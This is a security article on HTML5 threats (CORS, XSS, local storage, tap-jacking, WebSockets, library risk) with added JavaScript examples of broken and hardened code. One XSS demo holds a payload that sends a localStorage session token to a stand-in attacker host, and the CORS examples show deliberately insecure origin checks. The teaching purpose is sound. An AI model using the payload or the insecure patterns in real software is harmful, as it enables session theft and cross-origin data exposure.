
Why HTML5 security needs to be at the forefront of architects' minds

New features mean new threats, so Web developers and administrators need to keep HTML5 security a top priority.

HTML5 is emerging as the de-facto standard for rolling out new services that create business value in PC-based browser applications, and it is a leading choice for mobile applications as well. Given that, enterprise architects need to adopt a cautious and holistic approach to HTML5 security, treating it as a design-time concern rather than a problem to be fixed after a breach has occurred.

As David Eads, founder of Mobile Strategy Partners, an Internet security consultancy, observed, "HTML5 security is improving as more and more people focused on mobile are getting up to speed from a security perspective. But there is still a long way to go, and it is moving super fast. You only need one hole to have a major breach."

Enterprise architects need to consider the entire software development lifecycle as they ponder the best strategy for increasing HTML5 security in applications. Ensuring that Web applications and Web servers are properly and securely configured is critical. Most exploitation techniques rely on vulnerabilities or weaknesses in Web applications or server settings, which can be addressed by hardening configurations and disabling features that are not needed. Jerome Segura, senior security researcher at Malwarebytes Labs, said, "Unfortunately, this is up to Web developers and administrators to do a good job of securing their resources, which of course implies a proper understanding of the threats."

HTML5 security highlights

HTML5 brought a wide variety of new capabilities into standards-based browser applications that run across browsers and clients. However, an early assessment by the European Network and Information Security Agency (ENISA) identified 51 security threats baked into the new specifications.

Geoffrey Vaughan, security consultant at Security Compass, a security tools vendor, said HTML5 includes a number of new vulnerabilities that have a higher than normal impact and likelihood to occur, including security misconfiguration, cross-site scripting (XSS), access to local storage, and tap-jacking or cross-frame scripting:

  • Security misconfiguration and cross-origin resource sharing (CORS) issues are especially likely with cross-platform deployment frameworks. These frameworks ship with permissive default configurations; if the defaults are not hardened, the resulting weaknesses are carried straight into the application.
  • XSS has a much higher impact, because HTML5 applications, and hybrid mobile applications in particular, expose native device features to JavaScript through special tags and APIs. An attacker who can inject script therefore reaches far more personal data than in a classic Web page.
  • The way enterprises use HTML5's additional local storage capabilities can introduce further security issues. The main threat is that sensitive data stored on a device is easily leaked if the device is lost, stolen or compromised.
  • HTML5 simplifies the development of Web applications that operate across frames and layers. This capability, coupled with pages that do not restrict which origins may frame them, increases the risk of tap-jacking for HTML5 applications compared with older HTML specifications. The risk is more significant and easier to hide in mobile applications, where browser elements such as the navigation and URL bars can be hidden.
  • The WebSockets protocol introduces a new transport vector into the enterprise architecture. "This means HTTP-aware defenses [local antivirus or Web application firewalls] will not easily be able to classify the nature of the traffic," said Joe Bulman, senior systems architect for Wedge Networks, a security tools vendor.
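The CORS misconfiguration in the first bullet is easiest to see as code. The following is an added example, not code from the article or from any vendor quoted in it: three ways a server might answer a cross-origin request, from the common anti-patterns to an exact-match allowlist. The API origin, the allowlist and the attacker origins are assumptions for illustration, and the functions return header maps so the decision logic can be run without a Web server.

```javascript
// Added example: CORS decision logic, broken and hardened. Pure functions
// returning the response headers a server would emit for a given Origin.

// Assumed allowlist: the origins the hypothetical API is meant to serve.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Anti-pattern 1: reflect whatever Origin the browser sent, with credentials.
// Any site can now make authenticated calls and read the responses, which
// removes the same-origin policy for this API entirely.
function corsReflectAnyOrigin(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Anti-pattern 2: prefix matching. It looks like an allowlist, but an
// attacker-controlled "https://app.example.com.evil.example" passes.
function corsPrefixMatch(requestOrigin) {
  for (const allowed of ALLOWED_ORIGINS) {
    if (requestOrigin.startsWith(allowed)) {
      return {
        'Access-Control-Allow-Origin': requestOrigin,
        'Access-Control-Allow-Credentials': 'true',
      };
    }
  }
  return {};
}

// Hardened: exact match against a closed allowlist. The URL parser
// normalizes case, default ports and trailing slashes; the opaque "null"
// origin (sandboxed frames, file: pages) is rejected; Vary: Origin keeps
// shared caches from serving one origin's answer to another.
function corsAllowlist(requestOrigin) {
  if (!requestOrigin || requestOrigin === 'null') return {};
  let normalized;
  try {
    normalized = new URL(requestOrigin).origin;
  } catch {
    return {}; // not a syntactically valid origin: no CORS headers at all
  }
  if (!ALLOWED_ORIGINS.has(normalized)) return {};
  return {
    'Access-Control-Allow-Origin': normalized,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Stand-alone demo of the three behaviours against an attacker origin.
for (const origin of ['https://app.example.com', 'https://app.example.com.evil.example', 'null']) {
  console.log(origin, '->', {
    reflect: corsReflectAnyOrigin(origin)['Access-Control-Allow-Origin'],
    prefix: corsPrefixMatch(origin)['Access-Control-Allow-Origin'],
    allowlist: corsAllowlist(origin)['Access-Control-Allow-Origin'],
  });
}
```

Preflight headers (Access-Control-Allow-Methods and Allow-Headers) are omitted; the point is that the origin check must be an exact comparison against a closed list, never a reflection or a substring test.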

Security education is imperative

Organizations need to think about incorporating security education into their developer training program to address these problems, argued Mark Hammond, senior director of security consulting at Neohapsis, a security and risk management consulting company. This includes a stricter focus on access control compromise, injection and CORS attacks. Developers should also consider investigating the use of a content security policy to help mitigate some of these attacks.
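To make the content security policy recommendation concrete, here is an added example (not code from the article or from Neohapsis) of how a policy header is read and what it blocks. It is a deliberately small evaluator for the script-src directive: enough to show that an injected inline script is refused while the application's own scripts and one vetted CDN still load. The page origin, the CDN host and the nonce are assumptions; real browsers also handle hashes, wildcards and 'strict-dynamic', which this does not.

```javascript
// Added example: minimal Content-Security-Policy script-src evaluator.
// Assumed deployment: app served from https://app.example.com, one vetted
// bundle from https://cdn.example.net, inline scripts only via nonce.
const PAGE_ORIGIN = 'https://app.example.com';
const POLICY =
  "default-src 'self'; script-src 'self' https://cdn.example.net 'nonce-d29ya2Vy'; " +
  "object-src 'none'; frame-ancestors 'none'";

// Parse "name value value; name value" into a Map. Per the spec, when a
// directive is repeated the first occurrence wins.
function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    const key = name.toLowerCase();
    if (!directives.has(key)) directives.set(key, values);
  }
  return directives;
}

// Decide whether a script would execute. `script` is either
// { inline: true, nonce? } or { src: 'https://...', nonce? }.
function scriptAllowed(policyHeader, pageOrigin, script) {
  const policy = parsePolicy(policyHeader);
  // script-src falls back to default-src when absent.
  const sources = policy.get('script-src') || policy.get('default-src') || [];

  // A matching nonce allows the script whether inline or external.
  if (script.nonce !== undefined && sources.includes(`'nonce-${script.nonce}'`)) return true;

  if (script.inline) {
    // Any nonce or hash source in the list turns 'unsafe-inline' into a no-op,
    // so an injected <script> without the nonce is blocked.
    const strictInline = sources.some(s => s.startsWith("'nonce-") || s.startsWith("'sha"));
    return !strictInline && sources.includes("'unsafe-inline'");
  }

  const target = new URL(script.src).origin;
  for (const source of sources) {
    if (source === "'self'") {
      if (target === pageOrigin) return true;
    } else if (!source.startsWith("'")) {
      // host-source: scheme-less sources inherit the page's scheme.
      const withScheme = source.includes('://')
        ? source
        : `${new URL(pageOrigin).protocol}//${source}`;
      try {
        if (new URL(withScheme).origin === target) return true;
      } catch {
        // wildcard or unparsable host-source: unsupported here, treated as no match
      }
    }
  }
  return false;
}

// Stand-alone demo: an XSS payload's inline script versus the app's own code.
console.log('injected inline script runs?',
  scriptAllowed(POLICY, PAGE_ORIGIN, { inline: true }));
console.log('own bundle runs?',
  scriptAllowed(POLICY, PAGE_ORIGIN, { src: 'https://app.example.com/js/app.js' }));
console.log('frame-ancestors:', parsePolicy(POLICY).get('frame-ancestors'));
```

The frame-ancestors 'none' directive in the same header is the framing restriction that addresses the tap-jacking item above; object-src 'none' closes the plugin route that a script-src policy alone leaves open.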

It's also important to include a formal application security practice in this training, said Bulman. Developers should be familiar with OWASP guidance, related security tools and libraries, and practices such as penetration testing. He said, "In a security application development practice, powerful HTML5 features such as local storage and cross-origin scripting can be deployed securely."

New features = new attack surfaces

One concern among security experts is that the HTML5 stack is implemented and available on both mobile and Web browsers. "Hence, HTML5 attack vectors have relatively wider reach on a case-to-case basis," said Shreeraj Shah, founder and director of Blueinfy Solutions, a Web security tools vendor.

HTML5 introduces many new attack vectors, in some cases because new features enlarge the attack surface and in others because new implementations render known mitigation techniques useless. Of particular concern is that attackers may weaponize these features before defenders have catalogued the risks.

These features include:

  • Canvas for programmable drawing
  • WebGL for rendering 3-D graphics
  • Local storage
  • Data store on the client side
  • Geolocation
  • History manipulation
  • Cross-domain origins
  • Media tags
  • Content security policy
  • Local file-system access
  • Web messaging
  • Web workers

Shah explained, "A very large attack surface is getting exposed and there are troubling issues -- depending on the usage of features and components."

Some of the established problems from this larger attack surface allow hackers to leverage HTML5 components to launch client-side attacks like XSS and CSRF, which are on the OWASP Top 10 list of Web application vulnerabilities. Shah noted that HTML5 lets hackers use XSS vulnerabilities to reach user information, since applications often keep sensitive data about the user in the browser's HTML5 data stores, local storage and file system. Canvas, history manipulation and a few other features are also being abused from a privacy standpoint; canvas fingerprinting, for example, is used to identify a unique browser.
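The XSS-to-local-storage path Shah describes is short enough to show end to end. The following is an added example, not code from the article or from Blueinfy: the same profile widget rendered two ways, once by concatenating untrusted input into markup and once with output encoding for the HTML context. The payload, the storage key and the attacker host are constructed for the demo. Because any script running on the origin can read localStorage, the payload simply exfiltrates a stored token.

```javascript
// Added example: reflected XSS reading HTML5 local storage, and its fix.

// Any script running on the page's origin can read this, so a token kept
// in localStorage is one XSS away from the attacker. Key name is assumed.
const STOLEN_TARGET = "localStorage.getItem('sessionToken')";

// Constructed attack payload: breaks out of the title attribute, then
// injects an element whose error handler ships the token off-site.
const PAYLOAD =
  `"><img src=x onerror="fetch('https://attacker.example/?t='+${STOLEN_TARGET})">`;

// Vulnerable: untrusted data concatenated straight into HTML.
function renderProfileVulnerable(displayName) {
  return `<div class="profile" title="${displayName}">${displayName}</div>`;
}

// Encode the five HTML metacharacters. This is correct for element content
// and quoted attribute values; JavaScript, URL and CSS contexts each need
// their own encoder and must not be fed this output.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(untrusted).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened: same template, encoded values. In a real page the equivalent
// is assigning textContent / setAttribute rather than innerHTML.
function renderProfileSafe(displayName) {
  const safe = escapeHtml(displayName);
  return `<div class="profile" title="${safe}">${safe}</div>`;
}

// Count tag openers in the output: anything beyond the template's own
// <div> and </div> is markup the developer did not write.
function countTags(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}

// Stand-alone demo.
console.log('vulnerable tags:', countTags(renderProfileVulnerable(PAYLOAD)));
console.log('safe tags:      ', countTags(renderProfileSafe(PAYLOAD)));
console.log(renderProfileSafe(PAYLOAD));
```

Encoding stops the injection, but it does not change the fact that a token in localStorage is readable by every script on the origin. Where the design allows it, session tokens belong in HttpOnly cookies, which script cannot read even after a successful XSS.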

The use of HTML5 also expands the attack surface of the servers behind the applications, Shah noted. HTML5 components call SOA back ends through JavaScript, using JSON, SOAP or REST. The boundaries between the presentation, business logic and data access layers are now thin, and many components live in the application's client-side JavaScript. "Hence, it is possible to dissect those components and reverse-engineer the business logic. It allows an attacker to perform and exploit real business-layer functionalities," Shah said.

Caching and local storage

New capabilities in HTML5 make it easier to store data on the client side. These local storage techniques show promise for speeding application performance and allowing applications to continue to function even when the client goes offline. Without proper management, security and encryption, the same data could be leveraged by malicious hackers.

While there are tools for securing and encrypting this data on the client side, they are not failsafe, Eads argued.  "It is not proven unhackable. It is still too risky to store sensitive data on the client for most use cases. Also, it's not clear that there are advantages to storing data on the client side, given the management gymnastics involved."

Eads pointed out that in some cases native applications can provide better security for local storage, particularly on the iOS platform. On the other hand, Android platforms are more commonly rooted, which can obviate some of the security measures built into the platform.

Eads does make an exception for this general rule when the enterprise has greater control over the client using tools for mobile device management (MDM) and mobile application management (MAM). He said, "You have mitigation controls with MDM and MAM. It is good system architecture to have those controls in place. But there are organizations that store data on the client without these that put themselves at serious risk."

Third-party code (beware of libraries)

Many enterprises turn to HTML5 development libraries to reduce development time and improve the quality of new applications. This can lead to problems if the libraries contain vulnerabilities, or if their source code has been compromised by hackers. In most HTML5 applications, all JavaScript code, including third-party code, runs at the same security level, so a vulnerability or bug in a third-party library can compromise the entire browser runtime.

Brad Carleton, founder and CTO of TechPines, an application development firm explained, "The more libraries you use, the more complicated these problems get.  I'd say the biggest security precaution one can take is to thoroughly vet all third-party code before use. For special cases, where lots of potentially 'untrusted' third-party code might be run in the browser, there are a few tricks that can be used to create more secure setups using HTML5 Web Workers and iFrame sandboxing."

About the author:
George Lawton is a journalist based near San Francisco. Over the last 15 years, he's written more than 2,000 articles on computers, communications, business and other topics. Find out more at

